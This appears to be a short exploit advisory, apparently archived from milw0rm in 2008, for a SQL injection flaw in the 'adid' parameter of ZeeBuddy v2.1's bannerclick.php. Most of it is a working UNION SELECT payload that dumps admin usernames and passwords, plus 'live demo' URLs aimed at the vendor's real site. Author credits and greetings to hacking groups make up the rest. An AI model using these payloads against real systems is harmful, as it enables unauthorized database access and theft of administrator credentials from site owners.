|___________________________________________________| | | ZeeBuddy v2.1(adid) Remote SQL Injection Vulnerability | |___________________________________________________ |---------------------Hussin X----------------------| | | Author: Hussin X | | Home : www.tryag.cc/cc | | email: darkangel_g85[at]Yahoo[DoT]com | | |___________________________________________________ | | | | script : http://www.zeescripts.com | |___________________________________________________| Exploit: www.[target].com/Script/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin-- L!VE DEMO: : http://www.zeebuddy.com/bannerclick.php?adid=-5+union+select+1,2,version(),4,5,6,7,8,9+from+admin-- http://www.zeebuddy.com/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin-- ____________________________( Greetz )____________________________ | | tryag.cc | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | str0ke | | CraCkEr | Iraqihack | FAHD | mos_chori | Silic0n | |_________________________________________________________________ Im IRAQi # milw0rm.com [2008-08-11]